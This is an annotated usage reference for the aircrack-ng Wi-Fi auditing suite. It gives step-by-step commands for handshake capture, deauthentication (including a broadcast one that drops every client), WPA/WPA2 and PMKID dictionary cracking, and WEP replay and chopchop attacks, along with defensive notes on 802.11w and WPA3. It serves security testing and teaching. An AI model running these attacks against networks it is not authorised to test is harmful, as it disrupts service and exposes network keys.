Description
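Aircrack-ng is a complete suite of tools for assessing Wi-Fi network security. It focuses on four areas: monitoring (packet capture), attacking (replay attacks, deauthentication), testing (checking Wi-Fi cards and drivers), and cracking (WEP keys and WPA/WPA2 pre-shared keys). The WPA-PSK cracking is an offline dictionary attack against captured handshake material, so its result reflects the strength of the passphrase in use.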
Installation
BASH
# Kali/Debian
# Installs the distribution's packaged build; APT verifies it against the
# repository's signed metadata. The packaged version may lag upstream.
sudo apt install aircrack-ng
# From source
# This clones the tip of the default branch, so the build is unpinned: the
# steps below compile and install whatever the branch contains at clone time.
# NOTE(review): for a reproducible, auditable install, check out a release
# tag (<RELEASE_TAG>) and review or verify it before building.
git clone https://github.com/aircrack-ng/aircrack-ng
cd aircrack-ng
# Generates the configure script; needs the autotools toolchain and the
# project's build dependencies to be installed already.
autoreconf -i
./configure
# The build runs unprivileged; only the install step is run as root.
make && sudo make install
Basic Usage
BASH
# Enable monitor mode
# `check kill` stops the processes airmon-ng reports as interfering with
# monitor mode (typically the network manager and supplicant), so the host
# loses its normal network connectivity until they are restarted.
sudo airmon-ng check kill
# The commands below assume the resulting monitor interface is named wlan0mon.
sudo airmon-ng start wlan0
# Scan for networks
# Receive-only: lists the access points and associated clients in range.
sudo airodump-ng wlan0mon
# Capture handshake
# Stays on one channel, filters on one BSSID and writes the frames to disk.
# -w takes a file prefix; airodump-ng appends the numeric suffix, which is
# why the last command reads capture-01.cap.
sudo airodump-ng -c <channel> --bssid <AP_MAC> -w capture wlan0mon
# Deauthenticate client (force handshake)
# -0 selects deauthentication and 5 is the count. This is the one step in
# this listing that transmits: it disconnects the client, which then
# reconnects. Defensive notes: the frames are forged management frames, so
# networks that require 802.11w Protected Management Frames (mandatory in
# WPA3) ignore them, and a wireless IDS will typically alert on bursts of
# deauthentication frames.
sudo aireplay-ng -0 5 -a <AP_MAC> -c <CLIENT_MAC> wlan0mon
# Crack WPA handshake
# Offline dictionary attack: it succeeds only if the passphrase is in the
# wordlist. The mitigation is a long, random PSK, or moving to WPA3-SAE or
# 802.1X authentication.
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
Advanced Usage
BASH
# WEP cracking with ARP replay
# -3 is aireplay-ng's ARP request replay mode. It injects frames, so it is
# active and visible on the air. WEP is broken at the protocol level: the
# remediation is retiring WEP, not tuning it.
sudo aireplay-ng -3 -b <AP_MAC> -h <YOUR_MAC> wlan0mon
# NOTE(review): reads files named wep_capture*.cap; the capture step that
# would produce them is not shown in this listing.
aircrack-ng wep_capture*.cap
# PMKID capture (no client needed)
# hcxdumptool, hcxpcapngtool and hashcat are separate projects, not part of
# the aircrack-ng suite, and are not installed by the steps on this page.
# NOTE(review): option names have changed between hcxdumptool releases;
# confirm -o and --enable_status against the installed version.
sudo hcxdumptool -i wlan0mon -o capture.pcapng --enable_status=1
# Converts the capture to hashcat's 22000 (WPA PMKID/EAPOL) hash format.
hcxpcapngtool -o hash.hc22000 capture.pcapng
# Offline guessing again: the PMKID is derived from the PSK, so the result
# is bounded by passphrase strength. WPA3-SAE is not exposed to this
# offline guessing.
hashcat -m 22000 hash.hc22000 wordlist.txt
# Fake authentication
# -1 is fake authentication and 0 is the reassociation delay in seconds;
# it associates <YOUR_MAC> with the AP and belongs to the WEP techniques above.
sudo aireplay-ng -1 0 -e <ESSID> -a <AP_MAC> -h <YOUR_MAC> wlan0mon
# Chopchop attack
# -4 is aireplay-ng's KoreK chopchop mode, another WEP-only technique.
sudo aireplay-ng -4 -b <AP_MAC> -h <YOUR_MAC> wlan0mon
# Custom wordlist with crunch
# crunch emits every 8-character string over the digits 0-9 (10^8
# candidates) and aircrack-ng reads them from stdin (-w -). Defender
# takeaway: an 8-digit numeric PSK has a keyspace small enough to be
# exhausted offline.
crunch 8 8 0123456789 | aircrack-ng -w - capture*.cap
Common Workflows
BASH
# Full WPA2 attack workflow
# The same steps as Basic Usage, with example values filled in: channel 6
# and the placeholder BSSID AA:BB:CC:DD:EE:FF.
# `check kill` stops the host's network services before monitor mode starts.
sudo airmon-ng check kill && sudo airmon-ng start wlan0
sudo airodump-ng wlan0mon # Find target
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon # Capture
# No -c <CLIENT_MAC> is given here, so the deauthentication is broadcast and
# disconnects every client of the AP, not a single station. It has no effect
# where 802.11w Protected Management Frames are required.
sudo aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon # Deauth
# Offline dictionary attack; the outcome depends on the passphrase being in
# the wordlist.
aircrack-ng -w rockyou.txt capture-01.cap # Crack
# NOTE(review): the listing ends here, leaving the interface in monitor mode
# and the services stopped by `check kill` not restarted. Restoring the host
# (`airmon-ng stop wlan0mon`, then restarting the network manager) is not shown.